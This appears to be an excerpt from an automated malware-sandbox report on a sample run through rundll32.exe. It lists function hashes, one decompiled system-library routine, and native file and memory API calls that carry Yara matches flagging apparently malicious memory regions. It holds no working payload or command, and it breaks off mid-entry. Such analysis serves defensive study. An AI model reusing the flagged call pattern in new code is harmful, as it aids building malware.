                                                                              • Opcode ID: ebb721deec77e682b9e1ae74a0ef45446963a6eda769695ac6b8e908429e73f6
                                                                              • Instruction ID: d5485bb833f81c9cb29c7298f09912094db676a13c1e03907dd6982adbd80b7f
                                                                              • Opcode Fuzzy Hash: ebb721deec77e682b9e1ae74a0ef45446963a6eda769695ac6b8e908429e73f6
                                                                              • Instruction Fuzzy Hash: EF90027120504843D25171694404A460015E7D0346F51C021A4054694D96758D99F6A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49730, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0c7cffa82ec836a64be92868a9b4f42abfc5a882a4dd776715dce7529100e31
                                                                              • Instruction ID: 3bb52d245a4a8d8dbd2cfaf84f9634c5d87ddb40de0fa01db3ffdb3c1fd08539
                                                                              • Opcode Fuzzy Hash: e0c7cffa82ec836a64be92868a9b4f42abfc5a882a4dd776715dce7529100e31
                                                                              • Instruction Fuzzy Hash: 2A90026160500403D251716954187060015E7D0342F51D021A4014554DC6A98A99B6E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A4A710, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4b00b7f439efc14d6841e7089213aa37f780616aa4a34fcbf0ea37647507cbf2
                                                                              • Instruction ID: 4fed43aec20f879d244a96891f56089b9742b5fac8a2010aa7fc697f92818bd6
                                                                              • Opcode Fuzzy Hash: 4b00b7f439efc14d6841e7089213aa37f780616aa4a34fcbf0ea37647507cbf2
                                                                              • Instruction Fuzzy Hash: DD900271301000539611A6A95804A4A4105E7F0342B51D025A8004554C85A488A5A161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49760, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ff36bae6418b5be2706ee54de35d2ed0a2818cc762d853d2496c29149c1416d1
                                                                              • Instruction ID: 2bef6749e95e4eaffd5fe54a56269f45dc9e290a63a5e92e668d9b25185b4e65
                                                                              • Opcode Fuzzy Hash: ff36bae6418b5be2706ee54de35d2ed0a2818cc762d853d2496c29149c1416d1
                                                                              • Instruction Fuzzy Hash: 4890027120100403D211616955087070005E7D0342F51D421A4414558DD6A68895B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49770, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2ee1449c9d8fc6d112ef7608d9f685f7b63bb28e2a6fbacc0baafb5c6a344a84
                                                                              • Instruction ID: cfa6111913af4efd17efcc308eb0b62b0b27411b4b67914e2aff7d76574cc08f
                                                                              • Opcode Fuzzy Hash: 2ee1449c9d8fc6d112ef7608d9f685f7b63bb28e2a6fbacc0baafb5c6a344a84
                                                                              • Instruction Fuzzy Hash: 7D90026120504443D21165695408A060005E7D0346F51D021A5054595DC6758895F171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A4A770, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9aba4892918133ef9bee190533f2ba80d4b818b0a9181c6cd643e4d1235953b7
                                                                              • Instruction ID: d898b98534a8e8d0f13f5fe338b2acc67927a7cc9c71be38e8b090d90dc345a7
                                                                              • Opcode Fuzzy Hash: 9aba4892918133ef9bee190533f2ba80d4b818b0a9181c6cd643e4d1235953b7
                                                                              • Instruction Fuzzy Hash: 8290027520504443D61165695804A870005E7D0346F51D421A441459CD86A488A5F161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49670, Relevance: .0, Instructions: 2COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: d3e26ec99b546ce764cf27ec5fccbbd13b2b246e5416ca2ae4aab3feb16d02bd
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E00A9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                              0x00a9fdda
                                                                              0x00a9fde2
                                                                              0x00a9fde5
                                                                              0x00a9fdec
                                                                              0x00a9fdfa
                                                                              0x00a9fdff
                                                                              0x00a9fe0a
                                                                              0x00a9fe0f
                                                                              0x00a9fe17
                                                                              0x00a9fe1e
                                                                              0x00a9fe19
                                                                              0x00a9fe19
                                                                              0x00a9fe19
                                                                              0x00a9fe20
                                                                              0x00a9fe21
                                                                              0x00a9fe22
                                                                              0x00a9fe25
                                                                              0x00a9fe40

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9FDFA
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A9FE01
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A9FE2B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                              • Instruction ID: f9777dde4f8a5118051e18914841f152b5170893f61db5a15f5c931e5081b0a8
                                                                              • Opcode Fuzzy Hash: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                              • Instruction Fuzzy Hash: 46F0C232640601BFDA211A95DD07F23BBAAEB84730F240214F628965E1DA62A92097A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Analysis Process: rundll32.exe PID: 6048 Parent PID: 3388 rundll32.exeCOMMON

                                                                              Executed Functions

                                                                              Function 02BB81B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,02BB3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02BB3B87,007A002E,00000000,00000060,00000000,00000000), ref: 02BB81FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: .z`
                                                                              • API String ID: 823142352-1441809116
                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction ID: c06f60a2517aa8146295ec81e3ad02c1bb7cb5490cc68845d2a7205feb607cb2
                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction Fuzzy Hash: 42F0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB825A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtReadFile.NTDLL(02BB3D42,5E972F59,FFFFFFFF,02BB3A01,?,?,02BB3D42,?,02BB3A01,FFFFFFFF,5E972F59,02BB3D42,?,00000000), ref: 02BB82A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 31436921a12ce6f45ca95a70de23024821e09fbedbca5d09323ea843085d276f
                                                                              • Instruction ID: 8b9234b6a784245cdb38544e01c6791e07340cf293ce3cb0b3ce1062522487cd
                                                                              • Opcode Fuzzy Hash: 31436921a12ce6f45ca95a70de23024821e09fbedbca5d09323ea843085d276f
                                                                              • Instruction Fuzzy Hash: 46F0E7B6200508AFCB04DF98DC81EEB7BBAFF8C354F058659BA1DD7250D630E8118BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB8260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtReadFile.NTDLL(02BB3D42,5E972F59,FFFFFFFF,02BB3A01,?,?,02BB3D42,?,02BB3A01,FFFFFFFF,5E972F59,02BB3D42,?,00000000), ref: 02BB82A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction ID: 1b35c7609b9b890c8bf257d3faae5cd06f2e3a60e24550aa7322d339b75b3b63
                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction Fuzzy Hash: DFF0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158649BA1D97251DA30E8118BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB8390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02BA2D11,00002000,00003000,00000004), ref: 02BB83C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction ID: ba1f37ad2f2f76a2a3d7d45d8adc30ec55cdd7cfb16af3db3970da371d471ccc
                                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction Fuzzy Hash: E8F015B2200208ABCB14DF89CC80EEB77ADAF88750F118549BE0897241C630F810CBE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB838B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02BA2D11,00002000,00003000,00000004), ref: 02BB83C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: 8c49f9ac89e2aa145e7b772651f8314f8f795b0ad2784a25e62e65f418ff8087
                                                                              • Instruction ID: 8e19089f2d9631dad9749267daada5271c874a92830e2d0d2d3c9756ac40da82
                                                                              • Opcode Fuzzy Hash: 8c49f9ac89e2aa145e7b772651f8314f8f795b0ad2784a25e62e65f418ff8087
                                                                              • Instruction Fuzzy Hash: 93F015B6201108AFDB18DF98CC80EEBB7ADEF88350F118589FE0897251C630E811CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB82DA, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(02BB3D20,?,?,02BB3D20,00000000,FFFFFFFF), ref: 02BB8305
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: e71122083a53032bc3b3b30bc980164b0163b23ca25727f5ba70e974d1f3141e
                                                                              • Instruction ID: cc824a301630566b548c82c0475d17c6563807a2433e2241a00feda9757c0e73
                                                                              • Opcode Fuzzy Hash: e71122083a53032bc3b3b30bc980164b0163b23ca25727f5ba70e974d1f3141e
                                                                              • Instruction Fuzzy Hash: B4E08C722406146FE714DBA88C85FEB3B59EF48220F244699FA5C9B2D2C631E9428694
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB82E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(02BB3D20,?,?,02BB3D20,00000000,FFFFFFFF), ref: 02BB8305
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                              • Instruction ID: d1f0e768f238b5af69a3ccedb6d64f122f8f78a453c66fa9498a79d65bfeef79
                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                              • Instruction Fuzzy Hash: 2ED012752002146BD710EF98CC85EE7775DEF44750F154499BA185B241C570F90086E0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b2c6d41ab453cc0720d5291d6ed3c568b60b91770d18476f4c29d5baecffbec0
                                                                              • Instruction ID: f0157193fb2b2ea4e19b2f286e80e42bf51faee1cc5bce62449808db9d1df19d
                                                                              • Opcode Fuzzy Hash: b2c6d41ab453cc0720d5291d6ed3c568b60b91770d18476f4c29d5baecffbec0
                                                                              • Instruction Fuzzy Hash: 189002A5211001032106A9590705507005AD7D5395751C021F5006555CE661D8A16161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 046495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 663a480896ef4ccce9c4ab8c65a52b505ba4bdc71e18808259591233f9f0631b
                                                                              • Instruction ID: 7119080ef5f525b380da2fb0d0a5af74cea54ddf6b59e8f3ef6ac05087889e8f
                                                                              • Opcode Fuzzy Hash: 663a480896ef4ccce9c4ab8c65a52b505ba4bdc71e18808259591233f9f0631b
                                                                              • Instruction Fuzzy Hash: 299002E120200103610675594415616401ED7E0245F51C021E5005595DD565D8D17165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5803e25312753783f871642106ae3b76d2a9655e850ef99ab97e990b37012f08
                                                                              • Instruction ID: 180db98f1f9967267a980eee3dae7f60ff71dc6fd7c6986dad56fafdd8f7d7e3
                                                                              • Opcode Fuzzy Hash: 5803e25312753783f871642106ae3b76d2a9655e850ef99ab97e990b37012f08
                                                                              • Instruction Fuzzy Hash: C99002B120100903F1817559440564A0019D7D1345F91C015A4016659DDA55DA9977E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 093abc455429ed2f58dbe540ab8508bbbc149cf56ea82142b9336dad15f384a0
                                                                              • Instruction ID: caf2e67910b9b7563b2d2583c4630135e9bebe7a16d99f8d6119f001cd2762e9
                                                                              • Opcode Fuzzy Hash: 093abc455429ed2f58dbe540ab8508bbbc149cf56ea82142b9336dad15f384a0
                                                                              • Instruction Fuzzy Hash: 129002B120504943F14175594405A460029D7D0349F51C011A4055699DA665DD95B6A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 046496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 260d7d41bf8a771a0309e7be06630efaded0f9c26b22aaf59ff8cd177bd93dcf
                                                                              • Instruction ID: a12e51d23f88d1d5e5994ad2562f806a051dd781dd611e1d8f96b8d4539b8699
                                                                              • Opcode Fuzzy Hash: 260d7d41bf8a771a0309e7be06630efaded0f9c26b22aaf59ff8cd177bd93dcf
                                                                              • Instruction Fuzzy Hash: 349002B120108903F1116559840574A0019D7D0345F55C411A841565DD96D5D8D17161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 046496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: bc3cf2d3e7afb6bda1fb32f175177da796b7be0726d271f4a3e4daf875b0b69f
                                                                              • Instruction ID: 1d456ef3a59010c2b6d15f1b7525137ea1bfb0c29defb071e7a91a216ec27b79
                                                                              • Opcode Fuzzy Hash: bc3cf2d3e7afb6bda1fb32f175177da796b7be0726d271f4a3e4daf875b0b69f
                                                                              • Instruction Fuzzy Hash: 7E9002B120100943F10165594405B460019D7E0345F51C016A4115659D9655D8917561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 975dfaf3ce2049f74821bcda51ef72e559159a7472164cfd9662c9fd4eec6b1c
                                                                              • Instruction ID: 56dc98f84ca73fcab2854fd405bf7692b00c15375beabc98ce7afa866c174bc6
                                                                              • Opcode Fuzzy Hash: 975dfaf3ce2049f74821bcda51ef72e559159a7472164cfd9662c9fd4eec6b1c
                                                                              • Instruction Fuzzy Hash: 6E9002B120100503F101699954096460019D7E0345F51D011A901555AED6A5D8D17171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5db9fe772aaca13455620323b670b65babe4bb0dca64ff3fea21fc3da4f6dbc6
                                                                              • Instruction ID: daeb4400099d14f7c380191e2599bc8da0ecff625180755bb47a8476e0906ba7
                                                                              • Opcode Fuzzy Hash: 5db9fe772aaca13455620323b670b65babe4bb0dca64ff3fea21fc3da4f6dbc6
                                                                              • Instruction Fuzzy Hash: FD9002B131114503F111655984057060019D7D1245F51C411A481555DD96D5D8D17162
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 13492bcab119dea077100805926a5f4cd50eee9052fc9bb1171a09638704f332
                                                                              • Instruction ID: d91dc03c6491d486ccae4bcd9c02d6ac579e4178647a9bd2f7315cf07e83e9e1
                                                                              • Opcode Fuzzy Hash: 13492bcab119dea077100805926a5f4cd50eee9052fc9bb1171a09638704f332
                                                                              • Instruction Fuzzy Hash: 079002A921300103F1817559540960A0019D7D1246F91D415A400655DCD955D8A96361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9c067592516290d32116a341a9f59be4174967573d086e1fe6ab4fbd69447d4a
                                                                              • Instruction ID: 33ee846ddb0b1525da0b786db1a73792e3db8b4671f069bce6c5ef40bca40be3
                                                                              • Opcode Fuzzy Hash: 9c067592516290d32116a341a9f59be4174967573d086e1fe6ab4fbd69447d4a
                                                                              • Instruction Fuzzy Hash: 769002B120100513F11265594505707001DD7D0285F91C412A441555DDA696D992B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b7ad7fc0cc3517166656130499a17706c06e4952d8b42f1ff9ab5f19b4f8d2d4
                                                                              • Instruction ID: 301089024433c825ee46aa1d558d40c2b86a9098042c9d71c8e717fca164357a
                                                                              • Opcode Fuzzy Hash: b7ad7fc0cc3517166656130499a17706c06e4952d8b42f1ff9ab5f19b4f8d2d4
                                                                              • Instruction Fuzzy Hash: 939002A1242042537546B5594405507401AE7E0285B91C012A5405955C9566E896E661
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
